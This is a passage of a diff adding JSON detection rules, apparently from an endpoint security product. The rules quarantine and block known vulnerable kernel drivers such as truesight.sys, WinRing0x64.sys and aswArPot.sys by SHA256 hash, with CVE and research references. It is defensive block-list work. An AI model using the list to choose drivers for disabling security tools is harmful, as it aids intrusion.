+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983797Z",
+ "creation_date": "2026-03-23T11:45:29.983799Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0",
+ "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a1ef8f8-3486-5f9a-883a-6baf5f16c3eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152520Z",
+ "creation_date": "2026-03-23T11:45:31.152523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "906fc56b9ac376f202eef00fad708b2ba9b0226eae5d941ccbe772a514367ce2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a239e43-33b5-5cfc-aa67-eed9c38df89b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825262Z",
+ "creation_date": "2026-03-23T11:45:30.825266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825274Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "808c745b66231b01d1655ffda763a1a3cb5077541662cdb7de3f5648e0991693",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a26c4dc-097c-5d0d-81a0-61da1290710c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619665Z",
+ "creation_date": "2026-03-23T11:45:29.619667Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619673Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d804efc9a1a012e1f68288c0a2833b13d00eecd4a6e93258ba100aa07e3406f",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a32445c-0de3-5044-ba0c-2ba635b66d2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818452Z",
+ "creation_date": "2026-03-23T11:45:30.818454Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818459Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "212c05b487cd4e64de2a1077b789e47e9ac3361efa24d9aab3cc6ad4bd3bd76a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a33f32d-c7ef-5437-a35e-47908af457be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144357Z",
+ "creation_date": "2026-03-23T11:45:31.144359Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144365Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ba14a1e3e51eaa08fb50d3768297efe407509d7ea52f7a9e7a25aacb25fe0c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a373c51-9441-555e-b452-dc2960fb712e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141938Z",
+ "creation_date": "2026-03-23T11:45:31.141940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141952Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d470511934c81f329a0801774742e76f7c462ff3b324aeb00bc1861e6d8312e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a3d5e59-f70a-578f-ab6e-b1de7b283865",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149239Z",
+ "creation_date": "2026-03-23T11:45:31.149241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d890a2dace9686bccf5030ce6c745228e1d2ddf17b5c2f9015c2400e177aa05",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a3e068d-7c62-5b31-9318-c7e24af8abdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818888Z",
+ "creation_date": "2026-03-23T11:45:30.818890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "559ef0d415c5c3dbc1bfd598f4cad75aac9d4c5c6660fb61b23e44da4dbf89a9",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a4426e9-1efe-5309-ae00-902995d997c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813648Z",
+ "creation_date": "2026-03-23T11:45:31.813650Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813656Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13b5655c58306938d080551c66d473c1d16741a37450e6fba6c25f8ad496771e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a4ce970-7cd2-5fb0-807d-9ee0d8c51919",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969204Z",
+ "creation_date": "2026-03-23T11:45:29.969206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86a1b1bacc0c51332c9979e6aad84b5fba335df6b9a096ccb7681ab0779a8882",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a62e65f-a194-500c-84c9-499a17f147d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145485Z",
+ "creation_date": "2026-03-23T11:45:31.145487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0372eb7f1e79114ca1cb9d718b8b4a6297e2c38a460e9c13978b6d052c35b834",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a648736-1d70-5548-9e5f-4d003f11eb3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617185Z",
+ "creation_date": "2026-03-23T11:45:29.617187Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617192Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8",
+ "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a791e18-a3e5-528e-8275-0f323e4b426c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610975Z",
+ "creation_date": "2026-03-23T11:45:29.610977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1399e65aa55c898a6cd5fb32d4b19f5bbaf69c56c1383963c99b7a0804eb0203",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a7e3c3b-3c13-5aa2-8593-0d5ef08e57ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979221Z",
+ "creation_date": "2026-03-23T11:45:29.979223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec",
+ "comment": "Vulnerable Kernel Driver (aka nt2.sys) [https://www.loldrivers.io/drivers/cacc48e6-6ed8-431c-abee-88ee6c2dc3c1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a819009-8046-5d96-a116-6d985de74d93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457621Z",
+ "creation_date": "2026-03-23T11:45:30.457625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457644Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "902b754dd302a994074ea8d3e619d2f9000e6c6997e428f19f41533f7c5e192c",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a81a80d-85e4-5edb-a62a-d0a52f111990",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971255Z",
+ "creation_date": "2026-03-23T11:45:29.971258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971266Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2bbc6b9dd5e6d0327250b32305be20c89b19b56d33a096522ee33f22d8c82ff1",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a897261-8c53-536d-8ce9-d993a3a3c599",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616899Z",
+ "creation_date": "2026-03-23T11:45:29.616902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05e2d2f2b58da5391598d30d7f5f33ae38cfeb0d9b9ae19b4312de39c678f301",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a9442d9-b98b-53a7-9a5c-b2f3b18a975f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141856Z",
+ "creation_date": "2026-03-23T11:45:31.141858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141864Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c906804b11db7ca188e268146df47da23c570e4641e02f933ae1d9d3519c399",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9a99b515-0416-5e24-9dd6-c71ad90daf0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491116Z",
+ "creation_date": "2026-03-23T11:45:31.491120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0a81746b9c63ddf4bc6fa6d073a1a98fcacea3a8b628a5d615bf5644d9e0bcf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9aa19a9d-ca6c-54db-bc9e-8e958d640f64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818965Z",
+ "creation_date": "2026-03-23T11:45:30.818967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23440de2db935be1c06b40ff2809215d00d95930abe3fda70ea57cf8a9fc0e98",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ac7d5f5-33da-575b-be02-23f76869dc8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481640Z",
+ "creation_date": "2026-03-23T11:45:30.481642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481647Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c662ed197a5849cf491ee099885f8855b4f8a3d0f5b664c772f2b89c0314b44e",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9ac8379c-aeba-52d9-b960-fc24548aac30",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
